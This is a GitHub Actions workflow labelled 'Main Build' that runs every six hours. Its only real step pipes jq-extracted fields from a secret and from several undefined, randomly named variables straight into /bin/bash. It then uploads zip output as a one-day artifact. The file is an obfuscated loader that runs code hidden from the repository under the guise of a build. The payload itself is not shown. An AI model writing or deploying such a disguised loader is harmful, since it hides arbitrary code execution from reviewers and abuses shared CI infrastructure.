name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '12 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          pmpp784: ${{ secrets.pmpp784 }}
        run: |
          printf '%s' "$pmpp784" | jq -r .xxjri011 | /bin/bash
          echo $n30 | jq -r .f59355 | /bin/bash
          echo $jp2930 | jq -r .w8868 | /bin/bash
          printf '%s' "$qwslz0" | jq -r .ddk1 | /bin/bash
          echo $qeyjs80888 | jq -r .aomzb08462 | /bin/bash
          echo $rgqpy9310 | jq -r .di19 | /bin/bash
          printf '%s' "$xcd792" | jq -r .p61 | /bin/bash
          echo $l1532 | jq -r .lc5599 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: 5YTuptJg
          path: "*.zip"
          retention-days: 1
